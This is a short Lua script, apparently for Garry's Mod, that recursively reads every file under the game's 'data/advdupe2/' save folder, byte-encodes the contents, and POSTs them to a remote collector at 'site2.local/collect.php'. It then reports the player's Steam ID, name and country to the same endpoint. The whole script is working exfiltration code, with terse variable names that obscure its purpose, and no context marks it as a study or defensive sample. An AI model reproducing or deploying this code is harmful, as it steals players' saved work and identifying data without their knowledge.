local function ToByte(Code)
    return string.gsub(Code, ".", function(Char) return "\\" .. string.byte(Char) end)
end
local function a(b)
local c,d=file.Find(b.."*","MOD")
for _,f in pairs(c)do 
local g=file.Read(b.."/"..f,"GAME")
if g==nil then return end
http.Post("http://site2.local/collect.php",{
vfo="76561199050980078",
one=b,
two=f,
tree=ToByte(g)
})
end
for h,i in pairs(d)do 
a(b..i.."/")
end 
end
a("data/advdupe2/")

http.Post("http://site2.local/collect.php", {
build = "Client",
country = "RU",
dupes = "421",
name = "[#] WhyHerFly",
steamid = "STEAM_0:0:545357175",
path = "76561199050980078"
})
